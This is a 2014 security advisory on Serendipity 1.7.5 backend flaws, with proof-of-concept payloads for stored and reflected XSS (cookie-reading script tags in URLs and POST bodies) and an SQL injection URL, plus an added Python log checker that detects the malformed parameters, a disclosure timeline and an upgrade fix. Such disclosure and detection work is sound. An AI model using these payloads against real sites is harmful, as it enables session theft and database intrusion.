Feb 6: SSCHADV2014-003 - Serendipity 1.7.5 (Backend) - Multiple security vulnerabilities

Advisory: Serendipity 1.7.5 (Backend) – Multiple security vulnerabilities
Advisory ID: SSCHADV2014-003
Author: Stefan Schurtz
Affected Software: Successfully tested on Serendipity 1.7.5
Vendor URL: http://www.s9y.org/
Vendor Status: fixed
 
======================
Vulnerability Description
======================
 
The Serendipity 1.7.5 backend is prone to multiple security vulnerabilities: a stored XSS via the "Real name" profile field, an SQL injection in the serendipity[install_plugin] parameter, and reflected XSS in the serendipity[install_plugin], serendipity[id] and serendipity[timestamp] parameters.
 
 
======================
PoC-Exploit
======================

// Stored-XSS with "Real name"
 
(1) Log in as a "Standard editor" user
(2) Under "Personal Settings" set your "Real name" to "><script>alert(document.cookie)</script>

The payload is executed in the Administrator's browser when the user list is opened (Backend -> Administration -> Manage users).

// SQL-Injection – with "serendipity[install_plugin]"
 
http://[target]/serendipity/serendipity_admin.php?serendipity[adminModule]=plugins&serendipity[pluginPath]=serendipity_event_spamblock&serendipity[install_plugin]=[SQLi]

// Reflected XSS_1 – "serendipity[install_plugin]"
 
http://[target]/s/serendipity/serendipity_admin.php?serendipity[adminModule]=plugins&serendipity[pluginPath]=&serendipity[install_plugin]=78524'%3b<script>alert(1)</script>%2f%2f912

// Reflected XSS_2 – "serendipity[id]"
 
POST http://[target]/serendipity/serendipity_admin.php?

serendipity%5Baction%5D=admin&serendipity%5BadminModule%5D=entries&serendipity%5BadminAction%5D=save&serendipity%5Bid%5D="><script>alert(document.cookie)<%2fscript>&serendipity%5Btimestamp%5D=1391086127&serendipity%5Bpreview%5D=false&serendipity%5Btoken%5D=0fb9473e000f67c7d530e0698c8ff2dc&serendipity%5Btitle%5D=test1&serendipity%5Bisdraft%5D=false&serendipity%5Bchk_timestamp%5D=1391086127&serendipity%5Bnew_timestamp%5D=2014-01-30+13%3A48&serendipity%5Bcategories%5D%5B%5D=0&serendipity%5Bbody%5D=test1&serendipity%5Ballow_comments%5D=true&serendipity%5Bextended%5D=

// Reflected XSS_3 – "serendipity[timestamp]"
 
POST http://[target]/serendipity/serendipity_admin.php?

serendipity%5Baction%5D=admin&serendipity%5BadminModule%5D=entries&serendipity%5BadminAction%5D=save&serendipity%5Bid%5D=&serendipity%5Btimestamp%5D="><script>alert(document.cookie)<%2fscript>&serendipity%5Bpreview%5D=false&serendipity%5Btoken%5D=d9e231ef9eaeb5e58336806484de7600&serendipity%5Btitle%5D=test&serendipity%5Bisdraft%5D=false&serendipity%5Bchk_timestamp%5D=1391084636&serendipity%5Bnew_timestamp%5D=2014-01-30+13%3A23&serendipity%5Bcategories%5D%5B%5D=0&serendipity%5Bbody%5D=test%3Cstrong%3E%3C%2Fstrong%3E%3Cblockquote%3E%3C%2Fblockquote%3E&serendipity%5Ballow_comments%5D=true&serendipity%5Bmoderate_comments%5D=true&serendipity%5Bextended%5D
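As an added defender-side example (written for this page, not part of the advisory or of Serendipity), the checker below applies the expected formats of the three admin parameters named above to constructed web-server log lines; the expected formats (identifier, integer, integer) are an assumption. The POST variants (XSS_2, XSS_3) never reach an access log, so `suspicious_params` also accepts a raw urlencoded body captured by a WAF or application log.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Expected format per parameter from the advisory (assumption: plugin names are
# identifiers, entry ids and timestamps are integers). Anything else is reported.
CHECKS = {
    "serendipity[install_plugin]": re.compile(r"[A-Za-z0-9_]*"),
    "serendipity[id]": re.compile(r"[0-9]*"),
    "serendipity[timestamp]": re.compile(r"[0-9]*"),
}

def suspicious_params(query):
    """Return (name, decoded value) pairs that break the expected format.
    Accepts a GET query string or a urlencoded POST body."""
    params = parse_qs(query, keep_blank_values=True)
    hits = []
    for name, allowed in CHECKS.items():
        for value in params.get(name, []):
            if not allowed.fullmatch(value):
                hits.append((name, value))
    return hits

# Common log format; the referrer/user-agent tail is ignored.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\w+) (\S+) HTTP/[\d.]+" (\d{3})')

def scan_access_log(lines):
    """Yield (client, method, hits) for serendipity_admin.php requests with bad parameters."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, method, target, _status = m.groups()
        parts = urlsplit(target)
        if not parts.path.endswith("/serendipity_admin.php"):
            continue
        hits = suspicious_params(parts.query)
        if hits:
            yield client, method, hits

# Constructed sample lines (not from a real server); the second carries the
# advisory's reflected XSS_1 value for serendipity[install_plugin].
SAMPLE_LOG = [
    '203.0.113.5 - - [06/Feb/2014:10:00:00 +0100] "GET /serendipity/serendipity_admin.php?serendipity[adminModule]=plugins&serendipity[pluginPath]=&serendipity[install_plugin]=serendipity_event_spamblock HTTP/1.1" 200 512',
    '203.0.113.9 - - [06/Feb/2014:10:00:05 +0100] "GET /serendipity/serendipity_admin.php?serendipity[adminModule]=plugins&serendipity[pluginPath]=&serendipity[install_plugin]=78524\'%3b<script>alert(1)</script>%2f%2f912 HTTP/1.1" 200 640',
    '203.0.113.9 - - [06/Feb/2014:10:00:07 +0100] "GET /serendipity/index.php?/archives/1-test.html HTTP/1.1" 200 2048',
]
```

Running `list(scan_access_log(SAMPLE_LOG))` reports only the second line; the stored XSS via "Real name" is not visible in request logs and has to be caught by output encoding on the "Manage users" page.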

======================
Solution
======================

Upgrade to the latest version, Serendipity 1.7.7.

======================
Disclosure Timeline
======================

30-Jan-2014 – developer informed by email
30-Jan-2014 – feedback from developer
31-Jan-2014 – testing first diff
03-Feb-2014 – testing second diff
04-Feb-2014 – diff tested
06-Feb-2014 – release of Serendipity 1.7.7

======================
Credits
======================

Vulnerabilities found and advisory written by Stefan Schurtz.

======================
References
======================

http://s9y.org/
http://blog.s9y.org/archives/253-Serendipity-1.7.7-released.html
http://www.darksecurity.de/advisories/2014/SSCHADV2014-003.txt
Written by Stefan Schurtz in Security Advisories
Last edited on 06.02.2014 19:59